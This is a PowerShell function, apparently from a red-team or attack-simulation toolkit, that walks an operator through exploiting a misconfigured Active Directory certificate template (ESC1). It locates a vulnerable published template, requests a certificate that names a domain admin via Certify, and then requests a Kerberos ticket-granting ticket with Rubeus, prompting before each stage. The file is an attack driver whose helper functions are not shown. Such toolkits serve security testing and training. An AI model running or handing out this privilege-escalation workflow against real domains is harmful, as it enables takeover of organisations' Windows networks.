Private/New-AuthenticationCertificatesAttack.ps1
|
function New-AuthenticationCertificatesAttack { ################################################################################ ##### ##### ##### Exploiting Misconfigured Certificate Templates (ESC1) ##### ##### ##### ################################################################################ # Param([string] $param1, [string] $para2) $CurrentFunction = Get-FunctionName Write-Log -Message "### Start Function $CurrentFunction ###" $StartRunTime = (Get-Date).ToString($Script:DateFormatLog) #################### main code | out- host #################### Update-WindowTitle -NewTitle $Script:Phase25 Set-KeyValue -key "LastStage" -NewValue $Script:Phase25 Do { If (-not $SkipClearHost) { Clear-Host } Invoke-Output -T Header -M "Exploiting Misconfigured Certificate Templates (ESC1)" Invoke-Output -T Bullet -M "This attack abuses a misconfigured AD CS certificate template that allows `n a domain user to escalate privileges to those of a Domain Admin." # http://attack.mitre.org/techniques/T1649/ If ($UnAttended) { $answer = $No } else { $question = "Do you want to run this attack - Y or N? Default " $answer = Get-Answer -question $question -defaultValue $yes } If ($answer -eq $yes) { If (-not $SkipClearHost) { Clear-Host } write-log -Message "Start Attack Phase - Steal or Forge Authentication Certificates" # define parameter $altname = $Global:ASDomainAdmin $pemFile = ".\$altname.pem" $pfxFile = ".\$altname.pfx" If (-not $SkipClearHost) { Clear-Host } Invoke-Output -Type Header -Message "Step 1 - Identify Misconfigured and (!) Published Certificate Templates" $CATemplateInfo = Get-VulnerableCertificateTemplate #-myEntCA $EnterpriseCA $CAtemplate = $CATemplateInfo[0] $EnterpriseCA = $CATemplateInfo[2] Do { If (-not $SkipClearHost) { Clear-Host } Invoke-Output -Type Header -Message "Step 2 - Request Certificate with Certify" $PfxBase64 = Start-RequestingCertificate -myEntCA $EnterpriseCA -CAtemplate $CAtemplate -altname $Global:ASDomainAdmin -domainComputer $CATemplateInfo[1] $question = "Would you like to repeat this attack phase? Please enter Y or N. Default " $repeat = Get-Answer -question $question -defaultValue $no } Until ($repeat -eq $no) #region Step 5 - Request a Kerberos TGT Do { If (-not $SkipClearHost) { Clear-Host } Invoke-Output -Type Header -Message "Step 3 - Request a Ticket Granting Ticket (TGT) with Rubeus" Invoke-Output -T Bullet -M "Now we can request a TGT for the user for which we minted the new certificate." Get-KerberosTGT -pfxFile $PfxBase64 -altname $Global:ASDomainAdmin $question = "Would you like to repeat this attack phase? Please enter Y or N. Default " $repeat = Get-Answer -question $question -defaultValue $no } Until ($repeat -eq $no) #endregion Step 5 - Request a Kerberos TGT } ## else { return } If (-not $SkipClearHost) { Clear-Host } Write-Host "____________________________________________________________________`n" Write-Host " ??? REPEAT | Attack Phase - Steal or Forge Certificates ??? " Write-Host "____________________________________________________________________`n" } Until ($repeat -eq $no) Write-Log -Message " >> using $CAtemplate" ######################## main code ############################ $runtime = Get-RunTime -StartRunTime $StartRunTime Write-Log -Message " Run Time: $runtime [h] ###" Write-Log -Message "### End Function $CurrentFunction ###" # } |